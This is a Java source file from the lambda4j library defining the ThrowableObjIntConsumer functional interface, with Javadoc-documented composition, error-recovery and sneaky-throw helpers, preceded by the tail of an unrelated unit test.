assertTrue(Name.name(Arrays.asList("a", "b", "C", "D")).isMemberReference());
assertTrue(Name.name(Arrays.asList("a", "b", "C", "DEF")).isMemberReference());
assertFalse(Name.name(Arrays.asList("a", "b", "C", "Def")).isMemberReference());
}
}
|
|
/*
* Copyright (c) 2016 Gridtec. All rights reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package at.gridtec.lambda4j.consumer.bi.obj;
import at.gridtec.lambda4j.Lambda;
import at.gridtec.lambda4j.consumer.ThrowableConsumer;
import at.gridtec.lambda4j.consumer.ThrowableIntConsumer;
import at.gridtec.lambda4j.consumer.bi.ThrowableBiBooleanConsumer;
import at.gridtec.lambda4j.consumer.bi.ThrowableBiByteConsumer;
import at.gridtec.lambda4j.consumer.bi.ThrowableBiCharConsumer;
import at.gridtec.lambda4j.consumer.bi.ThrowableBiConsumer;
import at.gridtec.lambda4j.consumer.bi.ThrowableBiDoubleConsumer;
import at.gridtec.lambda4j.consumer.bi.ThrowableBiFloatConsumer;
import at.gridtec.lambda4j.consumer.bi.ThrowableBiIntConsumer;
import at.gridtec.lambda4j.consumer.bi.ThrowableBiLongConsumer;
import at.gridtec.lambda4j.consumer.bi.ThrowableBiShortConsumer;
import at.gridtec.lambda4j.core.exception.ThrownByFunctionalInterfaceException;
import at.gridtec.lambda4j.core.util.ThrowableUtils;
import at.gridtec.lambda4j.function.ThrowableBooleanFunction;
import at.gridtec.lambda4j.function.ThrowableByteFunction;
import at.gridtec.lambda4j.function.ThrowableCharFunction;
import at.gridtec.lambda4j.function.ThrowableDoubleFunction;
import at.gridtec.lambda4j.function.ThrowableFloatFunction;
import at.gridtec.lambda4j.function.ThrowableFunction;
import at.gridtec.lambda4j.function.ThrowableIntFunction;
import at.gridtec.lambda4j.function.ThrowableLongFunction;
import at.gridtec.lambda4j.function.ThrowableShortFunction;
import at.gridtec.lambda4j.function.conversion.ThrowableBooleanToIntFunction;
import at.gridtec.lambda4j.function.conversion.ThrowableByteToIntFunction;
import at.gridtec.lambda4j.function.conversion.ThrowableCharToIntFunction;
import at.gridtec.lambda4j.function.conversion.ThrowableDoubleToIntFunction;
import at.gridtec.lambda4j.function.conversion.ThrowableFloatToIntFunction;
import at.gridtec.lambda4j.function.conversion.ThrowableLongToIntFunction;
import at.gridtec.lambda4j.function.conversion.ThrowableShortToIntFunction;
import at.gridtec.lambda4j.function.to.ThrowableToIntFunction;
import at.gridtec.lambda4j.operator.unary.ThrowableIntUnaryOperator;
import javax.annotation.Nonnegative;
import javax.annotation.Nonnull;
import javax.annotation.Nullable;
import java.util.Objects;
import java.util.function.Function;
import java.util.function.ObjIntConsumer;
/**
* Represents an operation that accepts one object-valued and one {@code int}-valued input argument, returns no
* result and is able to throw any {@link Throwable}. This is a (reference, int) specialization of {@link
* ThrowableBiConsumer}. Unlike most other functional interfaces, {@code ThrowableObjIntConsumer} is expected to
* operate via side-effects.
* <p>
* This is a {@link FunctionalInterface} whose functional method is {@link #acceptThrows(Object, int)}.
*
* @param <T> The type of the first argument to the consumer
* @param <X> The type of the throwable to be thrown by this consumer
* @apiNote This is a throwable JDK lambda.
* @see ThrowableBiConsumer
*/
@SuppressWarnings("unused")
@FunctionalInterface
public interface ThrowableObjIntConsumer<T, X extends Throwable> extends Lambda, ObjIntConsumer<T> {
/**
* Constructs a {@link ThrowableObjIntConsumer} based on a lambda expression or a method reference. The given
* lambda expression or method reference is returned as-is, which implicitly converts it to the desired target
* type. With this method, it is possible to ensure that the correct target type is used for a lambda expression
* or method reference.
*
* @param <T> The type of the first argument to the consumer
* @param <X> The type of the throwable to be thrown by this consumer
* @param expression A lambda expression or (typically) a method reference, e.g. {@code this::method}
* @return A {@code ThrowableObjIntConsumer} from the given lambda expression or method reference.
* @implNote This implementation allows the given argument to be {@code null}; if {@code null} is given,
* {@code null} is returned.
* @see <a href="https://docs.oracle.com/javase/tutorial/java/javaOO/lambdaexpressions.html#syntax">Lambda
* Expression</a>
* @see <a href="https://docs.oracle.com/javase/tutorial/java/javaOO/methodreferences.html">Method Reference</a>
*/
static <T, X extends Throwable> ThrowableObjIntConsumer<T, X> of(
@Nullable final ThrowableObjIntConsumer<T, X> expression) {
return expression;
}
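/*
 * Illustrative usage sketch (not part of the original source; the chosen types and lambda body are only an
 * assumption for demonstration purposes):
 *
 *   ThrowableObjIntConsumer<java.io.Writer, java.io.IOException> write =
 *           ThrowableObjIntConsumer.of((writer, value) -> writer.write(value));
 *
 * of(...) returns the lambda as-is but fixes its target type, which is handy in expression contexts, e.g. to
 * chain andThen(...) or sneakyThrow() without declaring an intermediate variable.
 */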
/**
* Calls the given {@link ThrowableObjIntConsumer} with the given arguments.
*
* @param <T> The type of the first argument to the consumer
* @param <X> The type of the throwable to be thrown by this consumer
* @param consumer The consumer to be called
* @param t The first argument to the consumer
* @param value The second argument to the consumer
* @throws NullPointerException If given argument is {@code null}
* @throws X Any throwable from this consumer's action
*/
static <T, X extends Throwable> void call(@Nonnull final ThrowableObjIntConsumer<? super T, ? extends X> consumer,
T t, int value) throws X {
Objects.requireNonNull(consumer);
consumer.acceptThrows(t, value);
}
/**
* Creates a {@link ThrowableObjIntConsumer} which uses the {@code first} parameter of this one as argument for the
* given {@link ThrowableConsumer}.
*
* @param <T> The type of the first argument to the consumer
* @param <X> The type of the throwable to be thrown by this consumer
* @param consumer The consumer which accepts the {@code first} parameter of this one
* @return A {@code ThrowableObjIntConsumer} which uses the {@code first} parameter of this one as argument
* for the given {@code ThrowableConsumer}.
* @throws NullPointerException If given argument is {@code null}
*/
@Nonnull
static <T, X extends Throwable> ThrowableObjIntConsumer<T, X> onlyFirst(
@Nonnull final ThrowableConsumer<? super T, ? extends X> consumer) {
Objects.requireNonNull(consumer);
return (t, value) -> consumer.acceptThrows(t);
}
/**
* Creates a {@link ThrowableObjIntConsumer} which uses the {@code second} parameter of this one as argument for the
* given {@link ThrowableIntConsumer}.
*
* @param <T> The type of the first argument to the consumer
* @param <X> The type of the throwable to be thrown by this consumer
* @param consumer The consumer which accepts the {@code second} parameter of this one
* @return A {@code ThrowableObjIntConsumer} which uses the {@code second} parameter of this one as argument
* for the given {@code ThrowableIntConsumer}.
* @throws NullPointerException If given argument is {@code null}
*/
@Nonnull
static <T, X extends Throwable> ThrowableObjIntConsumer<T, X> onlySecond(
@Nonnull final ThrowableIntConsumer<? extends X> consumer) {
Objects.requireNonNull(consumer);
return (t, value) -> consumer.acceptThrows(value);
}
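/*
 * Illustrative sketch (not part of the original source; names are hypothetical): onlyFirst and onlySecond adapt
 * single-argument consumers to the two-argument shape, ignoring the other argument.
 *
 *   ThrowableObjIntConsumer<String, Exception> logText =
 *           ThrowableObjIntConsumer.onlyFirst(t -> System.out.println(t));
 *   ThrowableObjIntConsumer<String, Exception> logValue =
 *           ThrowableObjIntConsumer.onlySecond(v -> System.out.println(v));
 */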
/**
* Applies this consumer to the given arguments.
*
* @param t The first argument to the consumer
* @param value The second argument to the consumer
* @throws X Any throwable from this consumer's action
*/
void acceptThrows(T t, int value) throws X;
/**
* Applies this consumer to the given arguments.
*
* @param t The first argument to the consumer
* @param value The second argument to the consumer
* @apiNote This method mainly exists to use this {@link ThrowableObjIntConsumer} in JRE specific methods only
* accepting {@link ObjIntConsumer}. If this consumer should be applied, then the {@link #acceptThrows(Object, int)}
* method should be used.
* @implSpec Overrides the {@link ObjIntConsumer#accept(Object, int)} method with a default implementation which
* calls the {@link #acceptThrows(Object, int)} method of this consumer and catches any {@link Throwable} thrown
* from it. If the throwable is of type {@link Error} it is rethrown as is; other {@code Throwable} types are
* wrapped in a {@link ThrownByFunctionalInterfaceException} (see {@link #nest()}).
*/
@Override
default void accept(T t, int value) {
nest().accept(t, value);
}
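/*
 * Behavioural note (added for clarity, not part of the original source): since accept(...) delegates to
 * nest().accept(...), a checked throwable raised in acceptThrows(...) surfaces from accept(...) wrapped in a
 * ThrownByFunctionalInterfaceException, while an Error propagates as-is (see nest() and recover() below).
 */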
/**
* Partially applies this consumer to the given first argument, producing a {@link ThrowableIntConsumer} as
* result.
*
* @param t The first argument to this consumer used to partially apply it
* @return A {@code ThrowableIntConsumer} that represents this consumer partially applied to the given argument.
*/
@Nonnull
default ThrowableIntConsumer<X> pacceptThrows(T t) {
return (value) -> this.acceptThrows(t, value);
}
/**
* Partially applies this consumer to the given second argument, producing a {@link ThrowableConsumer} as result.
*
* @param value The second argument to this consumer used to partially apply it
* @return A {@code ThrowableConsumer} that represents this consumer partially applied to the given argument.
*/
@Nonnull
default ThrowableConsumer<T, X> pacceptThrows(int value) {
return (t) -> this.acceptThrows(t, value);
}
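/*
 * Illustrative sketch of partial application (not part of the original source; someWriter is hypothetical):
 *
 *   ThrowableObjIntConsumer<java.io.Writer, java.io.IOException> write = (w, c) -> w.write(c);
 *   ThrowableIntConsumer<java.io.IOException> writeToSome = write.pacceptThrows(someWriter); // first argument fixed
 *   ThrowableConsumer<java.io.Writer, java.io.IOException> writeA = write.pacceptThrows(65); // second argument fixed
 */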
/**
* Returns the number of arguments for this consumer.
*
* @return The number of arguments for this consumer.
* @implSpec The default implementation always returns {@code 2}.
*/
@Nonnegative
default int arity() {
return 2;
}
/**
* Returns a composed {@link ThrowableBiConsumer} that first applies the {@code before} functions to its input, and
* then applies this consumer to the result.
*
* @param <A> The type of the argument to the first given function, and of composed consumer
* @param <B> The type of the argument to the second given function, and of composed consumer
* @param before1 The first function to apply before this consumer is applied
* @param before2 The second function to apply before this consumer is applied
* @return A composed {@code ThrowableBiConsumer} that first applies the {@code before} functions to its input, and
* then applies this consumer to the result.
* @throws NullPointerException If given argument is {@code null}
* @implSpec The input argument of this method is able to handle every type.
*/
@Nonnull
default <A, B> ThrowableBiConsumer<A, B, X> compose(
@Nonnull final ThrowableFunction<? super A, ? extends T, ? extends X> before1,
@Nonnull final ThrowableToIntFunction<? super B, ? extends X> before2) {
Objects.requireNonNull(before1);
Objects.requireNonNull(before2);
return (a, b) -> acceptThrows(before1.applyThrows(a), before2.applyAsIntThrows(b));
}
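/*
 * Illustrative sketch for compose (not part of the original source; names are hypothetical):
 *
 *   ThrowableObjIntConsumer<String, Exception> print = (s, i) -> System.out.println(s + i);
 *   // Accept (StringBuilder, Long) input by mapping the first argument to String and the second to int first.
 *   ThrowableBiConsumer<StringBuilder, Long, Exception> adapted =
 *           print.compose(StringBuilder::toString, l -> l.intValue());
 */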
/**
* Returns a composed {@link ThrowableBiBooleanConsumer} that first applies the {@code before} functions to its
* input, and then applies this consumer to the result. This method is just convenience, to provide the ability to
* execute an operation which accepts {@code boolean} input, before this primitive consumer is executed.
*
* @param before1 The first function to apply before this consumer is applied
* @param before2 The second function to apply before this consumer is applied
* @return A composed {@code ThrowableBiBooleanConsumer} that first applies the {@code before} functions to its
* input, and then applies this consumer to the result.
* @throws NullPointerException If given argument is {@code null}
* @implSpec The input argument of this method is able to handle primitive values. In this case this is {@code
* boolean}.
*/
@Nonnull
default ThrowableBiBooleanConsumer<X> composeFromBoolean(
@Nonnull final ThrowableBooleanFunction<? extends T, ? extends X> before1,
@Nonnull final ThrowableBooleanToIntFunction<? extends X> before2) {
Objects.requireNonNull(before1);
Objects.requireNonNull(before2);
return (value1, value2) -> acceptThrows(before1.applyThrows(value1), before2.applyAsIntThrows(value2));
}
/**
* Returns a composed {@link ThrowableBiByteConsumer} that first applies the {@code before} functions to
* its input, and then applies this consumer to the result.
* This method is just convenience, to provide the ability to execute an operation which accepts {@code byte} input,
* before this primitive consumer is executed.
*
* @param before1 The first function to apply before this consumer is applied
* @param before2 The second function to apply before this consumer is applied
* @return A composed {@code ThrowableBiByteConsumer} that first applies the {@code before} functions to its input,
* and then applies this consumer to the result.
* @throws NullPointerException If given argument is {@code null}
* @implSpec The input argument of this method is able to handle primitive values. In this case this is {@code
* byte}.
*/
@Nonnull
default ThrowableBiByteConsumer<X> composeFromByte(
@Nonnull final ThrowableByteFunction<? extends T, ? extends X> before1,
@Nonnull final ThrowableByteToIntFunction<? extends X> before2) {
Objects.requireNonNull(before1);
Objects.requireNonNull(before2);
return (value1, value2) -> acceptThrows(before1.applyThrows(value1), before2.applyAsIntThrows(value2));
}
/**
* Returns a composed {@link ThrowableBiCharConsumer} that first applies the {@code before} functions to
* its input, and then applies this consumer to the result.
* This method is just convenience, to provide the ability to execute an operation which accepts {@code char} input,
* before this primitive consumer is executed.
*
* @param before1 The first function to apply before this consumer is applied
* @param before2 The second function to apply before this consumer is applied
* @return A composed {@code ThrowableBiCharConsumer} that first applies the {@code before} functions to its input,
* and then applies this consumer to the result.
* @throws NullPointerException If given argument is {@code null}
* @implSpec The input argument of this method is able to handle primitive values. In this case this is {@code
* char}.
*/
@Nonnull
default ThrowableBiCharConsumer<X> composeFromChar(
@Nonnull final ThrowableCharFunction<? extends T, ? extends X> before1,
@Nonnull final ThrowableCharToIntFunction<? extends X> before2) {
Objects.requireNonNull(before1);
Objects.requireNonNull(before2);
return (value1, value2) -> acceptThrows(before1.applyThrows(value1), before2.applyAsIntThrows(value2));
}
/**
* Returns a composed {@link ThrowableBiDoubleConsumer} that first applies the {@code before} functions to its
* input, and then applies this consumer to the result. This method is just convenience, to provide the ability to
* execute an operation which accepts {@code double} input, before this primitive consumer is executed.
*
* @param before1 The first function to apply before this consumer is applied
* @param before2 The second function to apply before this consumer is applied
* @return A composed {@code ThrowableBiDoubleConsumer} that first applies the {@code before} functions to its
* input, and then applies this consumer to the result.
* @throws NullPointerException If given argument is {@code null}
* @implSpec The input argument of this method is able to handle primitive values. In this case this is {@code
* double}.
*/
@Nonnull
default ThrowableBiDoubleConsumer<X> composeFromDouble(
@Nonnull final ThrowableDoubleFunction<? extends T, ? extends X> before1,
@Nonnull final ThrowableDoubleToIntFunction<? extends X> before2) {
Objects.requireNonNull(before1);
Objects.requireNonNull(before2);
return (value1, value2) -> acceptThrows(before1.applyThrows(value1), before2.applyAsIntThrows(value2));
}
/**
* Returns a composed {@link ThrowableBiFloatConsumer} that first applies the {@code before} functions to its input,
* and then applies this consumer to the result. This method is just convenience, to provide the ability to execute
* an operation which accepts {@code float} input, before this primitive consumer is executed.
*
* @param before1 The first function to apply before this consumer is applied
* @param before2 The second function to apply before this consumer is applied
* @return A composed {@code ThrowableBiFloatConsumer} that first applies the {@code before} functions to its input,
* and then applies this consumer to the result.
* @throws NullPointerException If given argument is {@code null}
* @implSpec The input argument of this method is able to handle primitive values. In this case this is {@code
* float}.
*/
@Nonnull
default ThrowableBiFloatConsumer<X> composeFromFloat(
@Nonnull final ThrowableFloatFunction<? extends T, ? extends X> before1,
@Nonnull final ThrowableFloatToIntFunction<? extends X> before2) {
Objects.requireNonNull(before1);
Objects.requireNonNull(before2);
return (value1, value2) -> acceptThrows(before1.applyThrows(value1), before2.applyAsIntThrows(value2));
}
/**
* Returns a composed {@link ThrowableBiIntConsumer} that first applies the {@code before} functions to
* its input, and then applies this consumer to the result.
* This method is just convenience, to provide the ability to execute an operation which accepts {@code int} input,
* before this primitive consumer is executed.
*
* @param before1 The first function to apply before this consumer is applied
* @param before2 The second operator to apply before this consumer is applied
* @return A composed {@code ThrowableBiIntConsumer} that first applies the {@code before} functions to its input,
* and then applies this consumer to the result.
* @throws NullPointerException If given argument is {@code null}
* @implSpec The input argument of this method is able to handle primitive values. In this case this is {@code
* int}.
*/
@Nonnull
default ThrowableBiIntConsumer<X> composeFromInt(
@Nonnull final ThrowableIntFunction<? extends T, ? extends X> before1,
@Nonnull final ThrowableIntUnaryOperator<? extends X> before2) {
Objects.requireNonNull(before1);
Objects.requireNonNull(before2);
return (value1, value2) -> acceptThrows(before1.applyThrows(value1), before2.applyAsIntThrows(value2));
}
/**
* Returns a composed {@link ThrowableBiLongConsumer} that first applies the {@code before} functions to
* its input, and then applies this consumer to the result.
* This method is just convenience, to provide the ability to execute an operation which accepts {@code long} input,
* before this primitive consumer is executed.
*
* @param before1 The first function to apply before this consumer is applied
* @param before2 The second function to apply before this consumer is applied
* @return A composed {@code ThrowableBiLongConsumer} that first applies the {@code before} functions to its input,
* and then applies this consumer to the result.
* @throws NullPointerException If given argument is {@code null}
* @implSpec The input argument of this method is able to handle primitive values. In this case this is {@code
* long}.
*/
@Nonnull
default ThrowableBiLongConsumer<X> composeFromLong(
@Nonnull final ThrowableLongFunction<? extends T, ? extends X> before1,
@Nonnull final ThrowableLongToIntFunction<? extends X> before2) {
Objects.requireNonNull(before1);
Objects.requireNonNull(before2);
return (value1, value2) -> acceptThrows(before1.applyThrows(value1), before2.applyAsIntThrows(value2));
}
/**
* Returns a composed {@link ThrowableBiShortConsumer} that first applies the {@code before} functions to its input,
* and then applies this consumer to the result. This method is just convenience, to provide the ability to execute
* an operation which accepts {@code short} input, before this primitive consumer is executed.
*
* @param before1 The first function to apply before this consumer is applied
* @param before2 The second function to apply before this consumer is applied
* @return A composed {@code ThrowableBiShortConsumer} that first applies the {@code before} functions to its input,
* and then applies this consumer to the result.
* @throws NullPointerException If given argument is {@code null}
* @implSpec The input argument of this method is able to handle primitive values. In this case this is {@code
* short}.
*/
@Nonnull
default ThrowableBiShortConsumer<X> composeFromShort(
@Nonnull final ThrowableShortFunction<? extends T, ? extends X> before1,
@Nonnull final ThrowableShortToIntFunction<? extends X> before2) {
Objects.requireNonNull(before1);
Objects.requireNonNull(before2);
return (value1, value2) -> acceptThrows(before1.applyThrows(value1), before2.applyAsIntThrows(value2));
}
/**
* Returns a composed {@link ThrowableObjIntConsumer} that performs, in sequence, this consumer followed by the
* {@code after} consumer. If performing this consumer throws an exception, the {@code after} consumer will not be
* performed.
*
* @param after The consumer to apply after this consumer is applied
* @return A composed {@link ThrowableObjIntConsumer} that performs, in sequence, this consumer followed by the
* {@code after} consumer.
* @throws NullPointerException If given argument is {@code null}
*/
@Nonnull
default ThrowableObjIntConsumer<T, X> andThen(
@Nonnull final ThrowableObjIntConsumer<? super T, ? extends X> after) {
Objects.requireNonNull(after);
return (t, value) -> {
acceptThrows(t, value);
after.acceptThrows(t, value);
};
}
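/*
 * Illustrative sketch for andThen (not part of the original source; names are hypothetical):
 *
 *   ThrowableObjIntConsumer<java.util.List<Integer>, Exception> add = (list, i) -> list.add(i);
 *   ThrowableObjIntConsumer<java.util.List<Integer>, Exception> addThenPrint =
 *           add.andThen((list, i) -> System.out.println(list));
 *   // addThenPrint first adds the value, then prints the list; if add throws, the printing step is skipped.
 */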
/**
* Returns a composed {@link ThrowableBiConsumer} which represents this {@link ThrowableObjIntConsumer}. Thereby the
* primitive input argument for this consumer is autoboxed. This method provides the possibility to use this {@code
* ThrowableObjIntConsumer} with methods provided by the {@code JDK}.
*
* @return A composed {@code ThrowableBiConsumer} which represents this {@code ThrowableObjIntConsumer}.
*/
@Nonnull
default ThrowableBiConsumer<T, Integer, X> boxed() {
return this::acceptThrows;
}
/**
* Returns a composed {@link ObjIntConsumer2} that applies this consumer to its input and nests the thrown {@link
* Throwable} from it. The {@code Throwable} is nested (wrapped) in a {@link ThrownByFunctionalInterfaceException},
* which is constructed from the thrown {@code Throwable}'s message and the thrown {@code Throwable} itself.
*
* @return A composed {@link ObjIntConsumer2} that applies this consumer to its input and nests the thrown {@code
* Throwable} from it.
* @implNote If thrown {@code Throwable} is of type {@link Error} it is thrown as-is and thus not nested.
* @see #nest(Function)
* @see ThrownByFunctionalInterfaceException
*/
@Nonnull
default ObjIntConsumer2<T> nest() {
return nest(throwable -> new ThrownByFunctionalInterfaceException(throwable.getMessage(), throwable));
}
/**
* Returns a composed {@link ObjIntConsumer2} that applies this consumer to its input and nests the thrown {@link
* Throwable} from it using {@code mapper} operation. Thereby {@code mapper} may modify the thrown {@code
* Throwable}, depending on its implementation, and return it nested (wrapped) in a {@link RuntimeException}.
*
* @param mapper The operation to map the thrown {@code Throwable} to {@code RuntimeException}
* @return A composed {@link ObjIntConsumer2} that applies this consumer to its input and nests the thrown {@code
* Throwable} from it using {@code mapper} operation.
* @throws NullPointerException If given argument is {@code null}
* @implNote If thrown {@code Throwable} is of type {@link Error} it is thrown as-is and thus not nested.
* @see #nest()
*/
@Nonnull
default ObjIntConsumer2<T> nest(@Nonnull final Function<? super Throwable, ? extends RuntimeException> mapper) {
return recover(throwable -> {
throw mapper.apply(throwable);
});
}
/**
* Returns a composed {@link ObjIntConsumer2} that first applies this consumer to its input, and then applies the
* {@code recover} operation if a {@link Throwable} is thrown from this one. The {@code recover} operation is
* represented by a curried operation which is called with the throwable information and the same arguments as
* this consumer.
*
* @param recover The operation to apply if this consumer throws a {@code Throwable}
* @return A composed {@link ObjIntConsumer2} that first applies this consumer to its input, and then applies the
* {@code recover} operation if a {@code Throwable} is thrown from this one.
* @throws NullPointerException If given argument or the returned enclosing consumer is {@code null}
* @implSpec The implementation checks that the returned enclosing consumer from {@code recover} operation is not
* {@code null}. If it is, then a {@link NullPointerException} with appropriate message is thrown.
* @implNote If thrown {@code Throwable} is of type {@link Error}, it is thrown as-is and thus not passed to {@code
* recover} operation.
*/
@Nonnull
default ObjIntConsumer2<T> recover(
@Nonnull final Function<? super Throwable, ? extends ObjIntConsumer<? super T>> recover) {
Objects.requireNonNull(recover);
return (t, value) -> {
try {
this.acceptThrows(t, value);
} catch (Error e) {
throw e;
} catch (Throwable throwable) {
final ObjIntConsumer<? super T> consumer = recover.apply(throwable);
Objects.requireNonNull(consumer, () -> "recover returned null for " + throwable.getClass() + ": "
+ throwable.getMessage());
consumer.accept(t, value);
}
};
}
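/*
 * Illustrative sketch for recover (not part of the original source; names are hypothetical):
 *
 *   ThrowableObjIntConsumer<java.io.Writer, java.io.IOException> write = (w, c) -> w.write(c);
 *   ObjIntConsumer2<java.io.Writer> safeWrite =
 *           write.recover(throwable -> (w, c) -> System.err.println("write failed: " + throwable));
 *   // safeWrite no longer declares the checked exception; on any non-Error throwable it falls back to logging.
 */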
/**
* Returns a composed {@link ObjIntConsumer2} that applies this consumer to its input and sneakily throws the
* thrown {@link Throwable} from it, if it is not of type {@link RuntimeException} or {@link Error}. This means that
* each throwable thrown from the returned composed consumer behaves exactly the same as an <em>unchecked</em>
* throwable does. As a result, there is no need to handle the throwable of this consumer in the returned composed
* consumer by either wrapping it in an <em>unchecked</em> throwable or declaring it in the {@code throws} clause,
* as it would be done in a non-sneaky-throwing consumer.
* <p>
* What sneaky throwing simply does, is to fake out the compiler and thus it bypasses the principle of
* <em>checked</em> throwables. On the JVM (class file) level, all throwables, checked or not, can be thrown
* regardless of the {@code throws} clause of methods, which is why this works at all.
* <p>
* However, when using this method to get a sneaky throwing consumer variant of this throwable consumer, the
* following advantages, disadvantages and limitations will apply:
* <p>
* If the calling-code is to handle the sneakily thrown throwable, it is required to add it to the {@code throws}
* clause of the method that applies the returned composed consumer. The compiler will not force the declaration in
* the {@code throws} clause anymore.
* <p>
* If the calling-code already handles the sneakily thrown throwable, the compiler requires it to be added to the
* {@code throws} clause of the method that applies the returned composed consumer. If not added, the compiler will
* error that the caught throwable is never thrown in the corresponding {@code try} block.
* <p>
* If the returned composed consumer is directly surrounded by a {@code try}-{@code catch} block to catch the
* sneakily thrown throwable from it, the compiler will error that the caught throwable is never thrown in the
* corresponding {@code try} block.
* <p>
* In any case, if the throwable is not added to the {@code throws} clause of the method that applies the
* returned composed consumer, the calling-code won't be able to catch the throwable by name. It will bubble and
* probably be caught in some {@code catch} statement, catching a base type such as {@code try { ... }
* catch(RuntimeException e) { ... }} or {@code try { ... } catch(Exception e) { ... }}, but perhaps this is
* intended.
* <p>
* When the called code never throws the specific throwable that it declares, it should obviously be omitted. For
* example: {@code new String(byteArr, "UTF-8") throws UnsupportedEncodingException}, but {@code UTF-8} is
* guaranteed by the Java specification to be always present. Here, the {@code throws} declaration is a nuisance and
* any solution to silence it with minimal boilerplate is welcome. The throwable should therefore be omitted in the
* {@code throws} clause of the method that applies the returned composed consumer.
* <p>
* With all that mentioned, the following example will demonstrate this method's correct use:
* <pre>{@code
* // when called with illegal value ClassNotFoundException is thrown
* public Class<?> sneakyThrowingFunctionalInterface(final String className) throws ClassNotFoundException {
* return ThrowableFunction.of(Class::forName) // create the correct throwable functional interface
* .sneakyThrow() // create a non-throwable variant which is able to sneaky throw (this method)
* .apply(className); // apply non-throwable variant -> may sneaky throw a throwable
* }
*
* // call the method which surrounds the sneaky throwing functional interface
* public void callingMethod() {
* try {
* final Class<?> clazz = sneakyThrowingFunctionalInterface("some illegal class name");
* // ... do something with clazz ...
* } catch(ClassNotFoundException e) {
* // ... do something with e ...
* }
* }
* }</pre>
* In conclusion, this somewhat contentious ability should be used carefully, of course, with the advantages,
* disadvantages and limitations described above kept in mind.
*
* @return A composed {@link ObjIntConsumer2} that applies this consumer to its input and sneakily throws the thrown
* {@link Throwable} from it, unless it is of type {@link RuntimeException} or {@link Error}.
* @implNote If thrown {@link Throwable} is of type {@link RuntimeException} or {@link Error}, it is thrown as-is
* and thus not sneakily thrown.
*/
@Nonnull
default ObjIntConsumer2<T> sneakyThrow() {
return (t, value) -> {
try {
this.acceptThrows(t, value);
} catch (RuntimeException | Error e) {
throw e;
} catch (Throwable throwable) {
throw ThrowableUtils.sneakyThrow(throwable);
}
};
}
}
|